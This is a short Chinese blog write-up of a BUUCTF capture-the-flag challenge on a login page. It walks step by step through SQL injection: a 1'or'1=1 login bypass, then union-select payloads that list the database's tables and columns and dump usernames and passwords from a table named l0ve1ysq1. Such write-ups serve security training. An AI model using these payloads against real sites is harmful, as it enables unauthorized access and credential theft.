BUUCTF



1.打开题目



注入方法可参考NewsCenter

2.测试注入点

username: 1'or'1=1

password: 1'or'1=1

登录成功，说明存在注入漏洞。

下面测试位点个数。

/check.php?username=admin' order by 3%23&password=1   正常回显

/check.php?username=admin' order by 4%23&password=1   报错

%23为“#”符号的URL编码形式



3.查库

联合查询注入 可参考NewsCenter

/check.php?username=-1'union select 1,2,database()%23&password=1

4.查表

/check.php?username=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1

当前库下有两个表geekuser l0ve1ysq1，我们先看看l0ve1ysq1

5.查字段

/check.php?username=-1' union select 1,2, group_concat(column_name)  from information_schema.columns where table_name=0x6c3076653179737131%23&password=1

注:

0x代表16进制

6c3076653179737131为l0ve1ysql的16进制形式

6.查值

/check.php?username=-1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1

最新文章

1. nth-child和:nth-of-type的区别
2. Windows 8.1安装 Vmware10
3. 【javaweb学习】XML和约束模式
4. Invoke() 方法是 Unity3D 的一种委托机制
5. mac下用ruby安装sass && webstorm下给scss文件添加watch
6. python基础（2）
7. mvc-1mvc和类(2)
8. Sklearn库例子4：分类——Lasso分类例子
9. zencart安装第三步出现空白
10. HDU-2262 Where is the canteen 概率DP,高斯消元
11. leetcode面试准备:Implement Trie (Prefix Tree)
12. AES加密跨平台出现的问题
13. 为什么新建的管理员账号权限没有Administrator大？
14. Stsadm 导入导出子站点
15. MiniProfiler工具
16. 1-安装MQTT服务器(Windows)
17. node初始
18. BZOJ1386 : [Baltic2000]Stickers
19. Javascript学习--BOM操作
20. pycharm汉化（3.6版本）

热门文章

1. 为什么 DNS 协议使用 UDP？只使用了 UDP 吗？
2. kafka配置内外网访问
3. Kubernetes 普及系列：容器基础入门
4. 记一次xss漏洞挖掘
5. 【DataBase】SQL45 Training 45题训练
6. Mysql 8.0安装
7. Android持续优化 - 提高流畅度
8. metasploit console 命令解释
9. openstack虚拟机从数据库修改卷虚拟机backend操作
10. FlinkSQL使用自定义UDTF函数行转列-IK分词器